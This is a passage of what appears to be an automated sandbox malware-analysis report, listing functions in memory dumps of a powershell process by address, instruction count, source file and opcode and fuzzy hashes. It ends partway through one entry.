                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBB8A0F5 Relevance: .2, Instructions: 242COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2163668862.00007FF9BBB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB80000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bbb80000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 938b3e9ae174cbee7031eb0f8a6b8d4ea26abdbed75f8dc1f54fc75761172d94
                                                                                                                  • Instruction ID: 494fc3ea0b86c552744867a53455377774744ff80995d1d802f52f1dfc905300
                                                                                                                  • Opcode Fuzzy Hash: 938b3e9ae174cbee7031eb0f8a6b8d4ea26abdbed75f8dc1f54fc75761172d94
                                                                                                                  • Instruction Fuzzy Hash: 6F711220A0CD5A4FE795EB2C8849736B7E1FF9A310F4542BAD14DCB2E2DE68AC41C741
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBB92B61 Relevance: .2, Instructions: 235COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2163668862.00007FF9BBB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB80000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bbb80000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8532b310716fa0883df285b5ea6accac4b7ad1b33376a21ef3c66e5bf0ebc478
                                                                                                                  • Instruction ID: 54b0847e8c3001497a6ad2431184b6b068b56acd7dabc28cd2b99ef1b682b0b4
                                                                                                                  • Opcode Fuzzy Hash: 8532b310716fa0883df285b5ea6accac4b7ad1b33376a21ef3c66e5bf0ebc478
                                                                                                                  • Instruction Fuzzy Hash: 8F719B31E08A1A8FEB94EF2C84497F977A1FF59310F10047AE95DC72D2CE68B9468B40
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBB89F4C Relevance: .2, Instructions: 173COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2163668862.00007FF9BBB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB80000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bbb80000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 01235e2dc70609e072e442f9f7831c48829f3e52fd2bf4d3f5712deb9f72151a
                                                                                                                  • Instruction ID: ae0e11fe3926551db3165abdcafbbe9301b7de7190d9dc54972ba02db70e4b46
                                                                                                                  • Opcode Fuzzy Hash: 01235e2dc70609e072e442f9f7831c48829f3e52fd2bf4d3f5712deb9f72151a
                                                                                                                  • Instruction Fuzzy Hash: 5551482091DA864FE74AAB6888563667BD0FF56310F4941FAD08DCB1E3DD5CB842C782
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBA13516 Relevance: .2, Instructions: 160COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2149795165.00007FF9BBA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBA00000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bba00000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 490c33984a3d34d6bdbd48a4eefaffd3e34c7bc06e0b59dc01fcd8ec4da1f06d
                                                                                                                  • Instruction ID: ca032ec52dc8fb9fa8c63379f6a4f21b53f277186ce2bd6943879880be5a9b36
                                                                                                                  • Opcode Fuzzy Hash: 490c33984a3d34d6bdbd48a4eefaffd3e34c7bc06e0b59dc01fcd8ec4da1f06d
                                                                                                                  • Instruction Fuzzy Hash: E8412B2160DBC50FE39A9F2C68417A23BE2DF5B354B0640FED59DCB2A3C9199C46C752
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB40F012 Relevance: .1, Instructions: 138COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2095923331.00007FF9BB3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bb3f0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 11e160439e86e104263ccf83f86d3b55e9f7e2a9e47f5c7202be4babe487ab5e
                                                                                                                  • Instruction ID: bcf8d008e7baa9cbec178224cf0f8a92c3f9ce6d0e681711812af77dfbee19e0
                                                                                                                  • Opcode Fuzzy Hash: 11e160439e86e104263ccf83f86d3b55e9f7e2a9e47f5c7202be4babe487ab5e
                                                                                                                  • Instruction Fuzzy Hash: 2241C531A08A064FEB94EF288454BBA73E2FFD5314F444076D90DC72E2CE69BD418780
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBB8A3D0 Relevance: .1, Instructions: 123COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2163668862.00007FF9BBB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB80000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bbb80000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 70e5373137b4b9ecd2ba342814ed18359c390da3b017f625803b6ae018611bd2
                                                                                                                  • Instruction ID: e9fb80fb0cefc33324c3e3c76836f818aeb479eabbf3f4a21e2d5e8cb33e4ec4
                                                                                                                  • Opcode Fuzzy Hash: 70e5373137b4b9ecd2ba342814ed18359c390da3b017f625803b6ae018611bd2
                                                                                                                  • Instruction Fuzzy Hash: BF31C53160C9194FD794EB2C9858B7677E1EB99321F1942BBD40DC72A2DD25EC81C741
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBA12EDD Relevance: .1, Instructions: 122COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2149795165.00007FF9BBA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBA00000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bba00000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a1907a1c6bf81b98a41cd49bc9f7b71aef792d82583562adce6c0645e1f72184
                                                                                                                  • Instruction ID: 91badc08823720712d79fbaf99df17b3315bd1a8af5216c1b03fe8718d847d09
                                                                                                                  • Opcode Fuzzy Hash: a1907a1c6bf81b98a41cd49bc9f7b71aef792d82583562adce6c0645e1f72184
                                                                                                                  • Instruction Fuzzy Hash: AE31137091CB844FE7569F2988516B67BE0EF96300F4501BEE48ACB193CA28E546C7A2
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBB89408 Relevance: .1, Instructions: 118COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2163668862.00007FF9BBB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB80000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bbb80000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e21b66b01146e2ab9c8256c3269dea73086eb2e90b59ccc3268e1211b0647234
                                                                                                                  • Instruction ID: a114bcca00a19e5a32bb73b962abadea8bee10e675f623adc0632590767f148d
                                                                                                                  • Opcode Fuzzy Hash: e21b66b01146e2ab9c8256c3269dea73086eb2e90b59ccc3268e1211b0647234
                                                                                                                  • Instruction Fuzzy Hash: 0D313C316189198FEB98EF2CC8657A473D1FF99314F5441B9D04EC72D6CE74A982CB41
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB1C8FCD Relevance: .1, Instructions: 115COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2081153585.00007FF9BB1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB1C0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bb1c0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 99305635f13df4905f387ff0445d8fb96d63c1cd0f2829b5d25c773ce01879ca
                                                                                                                  • Instruction ID: 98f3b843c78f76b64edbb41112c6d05336152e94b60a2fc96e93af30e11803b7
                                                                                                                  • Opcode Fuzzy Hash: 99305635f13df4905f387ff0445d8fb96d63c1cd0f2829b5d25c773ce01879ca
                                                                                                                  • Instruction Fuzzy Hash: 1631E821A08A474FEBAADB3998943B527E1EF59354F4540BAD40DCF2E2DD1CDA40C741
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBA06F09 Relevance: .1, Instructions: 113COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2149795165.00007FF9BBA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBA00000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bba00000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5edf191068f3948b257cbf6c3472ca0ea6c568308b29e21842367811a5bcb32c
                                                                                                                  • Instruction ID: 276a96e4584af1b5eedcfa77d04f362d7f602bf71ff476b3a515edf83315d468
                                                                                                                  • Opcode Fuzzy Hash: 5edf191068f3948b257cbf6c3472ca0ea6c568308b29e21842367811a5bcb32c
                                                                                                                  • Instruction Fuzzy Hash: CD310331D1CA8A4FDB81EF68C854BEA7BE0FF59714F0501AAE04DC71D2CA78A9058B80
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBB8DBED Relevance: .1, Instructions: 108COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2163668862.00007FF9BBB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB80000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bbb80000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: cbb1b53350ecd22e25da923ee1e3e866f7997606516ea6cd560af15f89ccece7
                                                                                                                  • Instruction ID: 66ef229f3c04fbb473f2e61e9072283d12a3ad8964f0099a322319d159117ce9
                                                                                                                  • Opcode Fuzzy Hash: cbb1b53350ecd22e25da923ee1e3e866f7997606516ea6cd560af15f89ccece7
                                                                                                                  • Instruction Fuzzy Hash: 60318F30609E064FDB99EB2C84A5B75B7E2FF9930170505BED40EC76A2CEA9F8418B00
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBB938D9 Relevance: .1, Instructions: 106COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2163668862.00007FF9BBB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB80000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bbb80000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5d54f93cb02095161f0d61eb4f7adebfb99ab14985bc0ac7a22fad7c012c547e
                                                                                                                  • Instruction ID: 69f3a675c614cd357026debcfa1f35b658ad68a062f218fd53a2cce847a9e864
                                                                                                                  • Opcode Fuzzy Hash: 5d54f93cb02095161f0d61eb4f7adebfb99ab14985bc0ac7a22fad7c012c547e
                                                                                                                  • Instruction Fuzzy Hash: C731AF3150CA4C9FDB49DFA8C849BE9BBF4FB96320F0441AFD049C3562D764A856CB51
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBB93C72 Relevance: .1, Instructions: 98COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2163668862.00007FF9BBB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB80000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bbb80000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 35158ea361206de748ffff2c7edb13b9a8ae5b35d1ba8b4065e5e20553e6085a
                                                                                                                  • Instruction ID: a88489e168800e6a3c2a98e6ca8001d551bc70f6c28b3f9c4c2cfc2f71849a77
                                                                                                                  • Opcode Fuzzy Hash: 35158ea361206de748ffff2c7edb13b9a8ae5b35d1ba8b4065e5e20553e6085a
                                                                                                                  • Instruction Fuzzy Hash: 5221EE22A1CE560BE668EB1CA4157B973E1FF86720F0045BEE08FC36D7CE59BD028644
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBA07248 Relevance: .1, Instructions: 96COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2149795165.00007FF9BBA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBA00000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bba00000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 25f7596e5982e79cb810b4c976daef1fcbf0486683803766136233787f613305
                                                                                                                  • Instruction ID: 5c7aa910580fa35a913eb90db3d86897bc4ac6db00b5a9b72413977c187e7a2d
                                                                                                                  • Opcode Fuzzy Hash: 25f7596e5982e79cb810b4c976daef1fcbf0486683803766136233787f613305
                                                                                                                  • Instruction Fuzzy Hash: D5215E31E18E1D4FEB90EE6C94456E9B7E1FBAC311F54453AE40ED32A1DA74B8418B40
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBB87B99 Relevance: .1, Instructions: 95COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2163668862.00007FF9BBB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB80000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bbb80000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d8ac58068610fc94daf2799aa81a686c419ed1010c42432cf112d57c3b460045
                                                                                                                  • Instruction ID: 31e75642d25bc4378dc1b0749abb87a4d1192d3213f6d64316dba036186ab497
                                                                                                                  • Opcode Fuzzy Hash: d8ac58068610fc94daf2799aa81a686c419ed1010c42432cf112d57c3b460045
                                                                                                                  • Instruction Fuzzy Hash: 3621483090DB864FD306DB288850BA57BE1EF46364F4902FAD448CB2E3DD68B945C791
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB5758FF Relevance: .1, Instructions: 80COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2110578814.00007FF9BB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB560000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bb560000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 92f2287c9b4b402784cfd4d91b49e4ce878326f8ca12a9e6fe16ddc005018367
                                                                                                                  • Instruction ID: f2c193693c0f831f5e5aca9dbfcabe8d0250e1f778e0ceb5bd689ce182e1cccc
                                                                                                                  • Opcode Fuzzy Hash: 92f2287c9b4b402784cfd4d91b49e4ce878326f8ca12a9e6fe16ddc005018367
                                                                                                                  • Instruction Fuzzy Hash: CE21A121B1CA0A4BD758EF1DA04166AB3E1FB94310F404639E45EC32E7DEA4F9418B46
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBB8DDD5 Relevance: .1, Instructions: 72COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2163668862.00007FF9BBB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB80000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bbb80000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c8d4a5104b645337f9e65c4cba69082ff8514577f5d506167bc706a5f05029d1
                                                                                                                  • Instruction ID: ff0d842c4637cad2ced2a410f5a8dc3e3ba3012ad8d5df7c3bf5d52a4148dc21
                                                                                                                  • Opcode Fuzzy Hash: c8d4a5104b645337f9e65c4cba69082ff8514577f5d506167bc706a5f05029d1
                                                                                                                  • Instruction Fuzzy Hash: 4D11033290DB9A4FCF96DF2898506EA7BB0FF56310B0405FFE589C7192DA34A915CB90
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB1C8648 Relevance: .1, Instructions: 72COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2081153585.00007FF9BB1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB1C0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bb1c0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8299ceb9ace4f78b1869326eea5c20f6a20aab76a3824f65213b2d2523abd2cd
                                                                                                                  • Instruction ID: c1934210d0f478e5397ffa378195adebb4dd5e2ae349cc598480576266333ba1
                                                                                                                  • Opcode Fuzzy Hash: 8299ceb9ace4f78b1869326eea5c20f6a20aab76a3824f65213b2d2523abd2cd
                                                                                                                  • Instruction Fuzzy Hash: 7E01E102E2CD9D0FF7A4EE3C589A2B45BC2EB9A154B4441F6E80CCB2E7EC58AC460241
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBB8DE66 Relevance: .1, Instructions: 71COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2163668862.00007FF9BBB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB80000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bbb80000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d225680be098d22fddec301e863171cbc92f245df876693870e3e58c49ac7be0
                                                                                                                  • Instruction ID: a9a562b8e1fe7ab89a5780917288810aa9bdbe2352097009795904aa28f8285f
                                                                                                                  • Opcode Fuzzy Hash: d225680be098d22fddec301e863171cbc92f245df876693870e3e58c49ac7be0
                                                                                                                  • Instruction Fuzzy Hash: 4F216D31919A9A8FDB99EF28C8547A577A2FF58300F1409BDE04EC72E6CA35B811CB40
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBA07059 Relevance: .1, Instructions: 65COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2149795165.00007FF9BBA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBA00000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bba00000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1c1c7a22d8f05604667e71a48322bc2c365cbd44ae782de884d0457929c47192
                                                                                                                  • Instruction ID: 116d13962ae8ee2271a1fa7c2cec6d71923aa340ebd123b585cf16eab2fffa68
                                                                                                                  • Opcode Fuzzy Hash: 1c1c7a22d8f05604667e71a48322bc2c365cbd44ae782de884d0457929c47192
                                                                                                                  • Instruction Fuzzy Hash: FE11D321D0D7821FE796CB3C94557E17BE0BF42624F9802FAD14CCA0F2CAADBA468201
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB1C93C9 Relevance: .1, Instructions: 64COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2081153585.00007FF9BB1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB1C0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bb1c0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: cd3372546c0279877153a72df70062afc3ccdab18fdb7b8278c9888a78e50f29
                                                                                                                  • Instruction ID: 57293a4acb356f1ef52cb3422b542c753345de2b2d7bc4910d7d13563cbb77c8
                                                                                                                  • Opcode Fuzzy Hash: cd3372546c0279877153a72df70062afc3ccdab18fdb7b8278c9888a78e50f29
                                                                                                                  • Instruction Fuzzy Hash: 55012B1160EE574FE352AA7CD8453B96B84EF46350F0540B3D44CCB1E2DD08ADCA83A1
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBA13342 Relevance: .1, Instructions: 53COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2149795165.00007FF9BBA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBA00000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bba00000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0c6344bb16961f70889d61d14ecd4f210fe331eebc432377799d843dfcda2995
                                                                                                                  • Instruction ID: 383156ef161a9e064f8b970ac9c5169528a8f31ec2727e9628e58e02e46765fa
                                                                                                                  • Opcode Fuzzy Hash: 0c6344bb16961f70889d61d14ecd4f210fe331eebc432377799d843dfcda2995
                                                                                                                  • Instruction Fuzzy Hash: 0F01A23190864EAFCF55EE58AC41AEA7BA4FB85325F00027BE619C3091DB65B512C791
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBB8DCDD Relevance: .0, Instructions: 49COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2163668862.00007FF9BBB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB80000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bbb80000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 13942ff7b7a2ff40a6c4dcaca67819c2c39fc16b02f582ebb446a9d1624b90fe
                                                                                                                  • Instruction ID: 5e73fc30b3353b0cbde53f21d678edc920626f9484b04751806762aa276afb77
                                                                                                                  • Opcode Fuzzy Hash: 13942ff7b7a2ff40a6c4dcaca67819c2c39fc16b02f582ebb446a9d1624b90fe
                                                                                                                  • Instruction Fuzzy Hash: 63F0283090D6960EDB6B963C14A03F63B91AF46310F0405FBD588C62D7DDA869818391
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBB89924 Relevance: .0, Instructions: 45COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2163668862.00007FF9BBB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB80000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bbb80000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: dec00c5cf75cd80a064ee9b8bf7bb69ba045e1f04854e77c2a904d398122b6a2
                                                                                                                  • Instruction ID: 10fed5f1352c7dc69a32ce57d16ddab6f9a274818103cecebcae5b045600169e
                                                                                                                  • Opcode Fuzzy Hash: dec00c5cf75cd80a064ee9b8bf7bb69ba045e1f04854e77c2a904d398122b6a2
                                                                                                                  • Instruction Fuzzy Hash: 58F0A7B250D54C2EE7589D19AC4BEF63B98E783234F00105EE58E82153E152B5138265
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBA070B4 Relevance: .0, Instructions: 36COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2149795165.00007FF9BBA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBA00000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bba00000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ca1f0237e4daed2e58edc481d27d948fb59631c0640de8d723444477ac4e9ab8
                                                                                                                  • Instruction ID: a5e762e91aa26c96f94ad404b6ac6110561497c4349029e5aa24a653cf30a5b8
                                                                                                                  • Opcode Fuzzy Hash: ca1f0237e4daed2e58edc481d27d948fb59631c0640de8d723444477ac4e9ab8
                                                                                                                  • Instruction Fuzzy Hash: 41F0E23090CB0A4FD790EA2C9854AB6B7E1EF89210F04087AD84CC32B1CD68F9818B82
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBA11BAD Relevance: .0, Instructions: 36COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2149795165.00007FF9BBA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBA00000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bba00000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b03c19a049f61e60de9adaf726e93ad9a8c1b33b6483363b6d47fd9e34194f52
                                                                                                                  • Instruction ID: 2b536614fa0ff535c230a440233d6466e5661839c96ec2631493f861c9596ebc
                                                                                                                  • Opcode Fuzzy Hash: b03c19a049f61e60de9adaf726e93ad9a8c1b33b6483363b6d47fd9e34194f52
